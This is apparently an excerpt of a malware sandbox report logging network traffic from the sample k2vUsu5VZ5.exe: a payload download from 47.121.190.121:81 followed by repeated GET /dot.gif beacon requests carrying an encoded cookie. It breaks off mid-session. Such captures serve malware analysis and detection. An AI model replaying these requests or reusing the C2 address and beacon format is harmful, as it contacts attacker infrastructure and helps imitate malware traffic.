              Jan 9, 2025 18:30:58.528168917 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.635725975 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.636087894 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.644826889 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.645133018 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.645313025 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.645456076 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.654491901 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657126904 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657198906 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657407045 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:59.657854080 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:59.662600994 CET815021047.121.190.121192.168.2.4
              • 47.121.190.121:81
              Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:26:55.558100939 CET | Bytes transferred: 188 | Direction: OUT | Data:
              GET /r9dN HTTP/1.1
              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:26:56.587992907 CET | Bytes transferred: 1236 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 296007


              Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49731 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:26:57.746829033 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:26:58.691802025 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:58 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49732 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:26:58.812841892 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:26:59.801598072 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:26:59.918812037 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:00.855838060 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49734 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:00.966552973 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:01.997495890 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49735 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:02.217262030 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:03.325920105 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:03.434497118 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:04.460484028 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:04 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:04.599736929 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:05.551656961 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:05.669267893 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:06.645804882 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:06.762603998 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:07.726672888 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:07.840800047 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:08.807055950 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:08 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:08.918637991 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:09.902756929 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:09 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:10.014218092 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:11.005397081 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:11.137886047 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:12.090567112 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:12.223458052 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:13.200107098 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:13.309554100 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:14.316638947 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:14.434680939 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:15.419775963 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:15.530555964 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:16.468209982 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:16.797921896 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:17.793488979 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:17.904405117 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:19.000231981 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:18 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:19.122412920 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:20.074717045 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:20.184319973 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:21.138092995 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:21.247315884 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:22.208900928 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:22 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:22.326389074 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:23.269861937 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:23.388303041 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Timestamp: Jan 9, 2025 18:27:24.458345890 CET | Bytes transferred: 114 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49761 | Destination IP: 47.121.190.121 | Destination Port: 81 | PID: 7148 | Process: C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp: Jan 9, 2025 18:27:24.575943947 CET | Bytes transferred: 386 | Direction: OUT | Data:
              GET /dot.gif HTTP/1.1
              Accept: */*
